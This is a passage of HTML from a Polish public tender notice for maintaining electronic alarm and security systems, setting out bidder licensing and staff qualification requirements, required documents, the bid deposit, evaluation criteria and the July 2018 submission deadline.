id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Terminem wykonania zamówienia będzie okres od podpisania umowy do 31.12.2018 r., z zastrzeżeniem, że przeglądy i konserwacje przewidziane w ramach podstawowego zakresu zamówienia powinny zostać wykonane do 30.11.2018 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">w zakresie posiadania uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów (dotyczy ZADANIA A i B):o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego na montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, oraz eksploatacji, konserwacji i naprawach w miejscach ich zainstalowania, zgodnie z ustawą o ochronie osób i mienia z dnia 22 sierpnia 1997 r. (t.jedn., Dz.U. z 2017 r. poz. 2213).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">w zakresie zdolności technicznej lub zawodowej (dotyczy ZADANIA A i B) o udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, iż skieruje do realizacji zamówienia publicznego, co najmniej dwie osoby wpisane na listę kwalifikowanych pracowników zabezpieczenia technicznego, z czego: - co najmniej 2 osoby winny posiadać:ŚWIADECTWO KWALIFIKACYJNE E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci do 1 kV na stanowisku EKSPLOATACJI, zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci z dnia 28 kwietnia 2003 r. (Dz.U. Nr 89, poz. 828 ze zmianami)- co najmniej 1 osoba winna posiadać:ŚWIADECTWO KWALIFIKACYJNE D uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci do 1 kV na stanowisku DOZORU, zgodnie z przepisami Rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci z dnia 28 kwietnia 2003 r. (Dz.U. Nr 89, poz. 828 ze zmianami)- co najmniej 1 osoba winna posiadać:Certyfikat Autoryzacji dla specjalisty - inżyniera w zakresie programowania, serwisu i konserwacji, wydany przez Schrack Seconet (lub równoważny)UWAGA: Wykonawca ma obowiązek zapewnić realizację zamówienia przez wskazane w ofercie osoby - zgodnie z Załącznikiem nr 8 do SIWZ - WYKAZ OSÓB. W przypadku zaistnienia, w toku realizacji zamówienia, okoliczności wymuszających konieczność zmiany którejkolwiek z osób wskazanych w Wykazie, Wykonawca ma obowiązek zapewnić na każde stanowisko osobę posiadającą co najmniej takie same kompetencje jak osoby wskazane na to stanowisko w ofercie. Zamawiający dopuszcza łączenie posiadanych uprawnień, z zachowaniem wymaganej minimalnej ilości osób kierowanych do realizacji zamówienia. Zmiana osoby/osób wskazanych w ofercie dokonywana jest na zasadach określonych w istotnych postanowieniach umowy (Załącznik nr 2 do SIWZ). Wskazane powyżej osoby należy traktować jako minimalne wymaganie Zamawiającego. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">ODPIS Z WŁAŚCIWEGO REJESTRU LUB Z CENTRALNEJ EWIDENCJI I INFORMACJI O DZIAŁALNOŚCI GOSPODARCZEJ, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp (jeżeli dokumenty nie są dostępne w ogólnodostępnych bezpłatnych bazach).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) Koncesja wydana przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego na: montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, oraz eksploatacji, konserwacji i naprawach w miejscach ich zainstalowania, wydana zgodnie z ustawą o ochronie osób i mienia z dnia 22 sierpnia 1997 r. (t.jedn., Dz.U. z 2017 r. poz. 2213) - kopia potwierdzona za zgodność z oryginałem2) WYKAZ OSÓB, skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem określonym w Załączniku nr 8 do SIWZ.Informacje w zakresie kwalifikacji i uprawnień osób wskazanych w Wykazie, kierowanych do realizacji zamówienia, winny zawierać wskazanie posiadania dokumentów, zgodnie w postawionym warunkiem udziału w postępowaniu (pkt. VI.1.2) lit. c SIWZ) takich jak:- ŚWIADECTWO KWALIFIKACYJNE E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci do 1 kV na stanowisku EKSPLOATACJI - ŚWIADECTWO KWALIFIKACYJNE D uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci do 1 kV na stanowisku DOZORU- Certyfikat Autoryzacji dla specjalisty - inżyniera w zakresie programowania, serwisu i konserwacji, wydany przez Schrack Seconet (lub równoważny),</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Zamawiający nie żąda dokumentów w tym zakresie</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) FORMULARZ OFERTY - wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem) (Załącznik nr 3 do SIWZ), składany w oryginale.2) ORYGINAŁ PEŁNOMOCNICTWA lub kopię potwierdzoną za zgodność z oryginałem przez osobę wystawiającą lub przez notariusza, jeżeli osobą podpisującą ofertę nie będzie osoba upoważniona na podstawie dokumentu określającego status prawny Wykonawcy. Dla pełnomocnictwa tego, zgodnie art. 1 ust. 1 pkt 2 ustawy z dnia 16 listopada 2006 r. o opłacie skarbowej (t.j. Dz.U. 2016 poz. 1827), nie jest wymagane uiszczenie opłaty.3) ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (o ile dotyczy). Zobowiązane składa się w formie pisemnej (oryginał - wg wzoru stanowiącego Załącznik nr 6 do SIWZ)4) DOKUMENT POTWIERDZAJĄCY WNIESIENIE WADIUM, w innej formie niż pieniężna, tj. oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz. Oryginał gwarancji lub poręczenia sporządzony w języku obcym składany jest wraz z tłumaczeniem na język polski5) OŚWIADCZENIE O PRZYNALEŻNOŚCI ALBO BRAKU PRZYNALEŻNOŚCI DO TEJ SAMEJ GRUPY KAPITAŁOWEJ, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp albo braku przynależności do jakiejkolwiek grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w przedmiotowym postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi Załącznik nr 7 do SIWZ.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: ZADANIE A - 2 000,00 zł.ZADANIE B - 2 000,00 złRazem: 4 000,00 złWadium może być wniesione wyłącznie w formach określonych w art. 45 ust. 6 ustawy Pzp. Miejsce i sposób wniesienia wadium:Wadium wniesione w pieniądzu należy przelać na rachunek bankowy Zamawiającego przed upływem terminu składania ofert:PKO BP S.A Oddział w ŁodziNumer rachunku: 02 1020 3352 0000 1602 0221 0482Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku Zamawiającego. Zamawiający zaleca, aby dokument potwierdzający dokonanie przelewu wadium został załączony do oferty.2) Wadium wniesione w innej niż pieniądz dopuszczonej formie, należy złożyć w oryginale wraz z ofertą w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty (w odrębnej kopercie), a jego kopia w ofercie.Wadium powinno być oznaczone w następujący sposób: WADIUM postępowanie nr 121/DTOK/PN/2018</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Czas reakcji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiany umowy przewidziano zgodnie z Istotnymi Postanowieniami Umowy, stanowiącymi Załącznik nr 2 do SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-07-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span 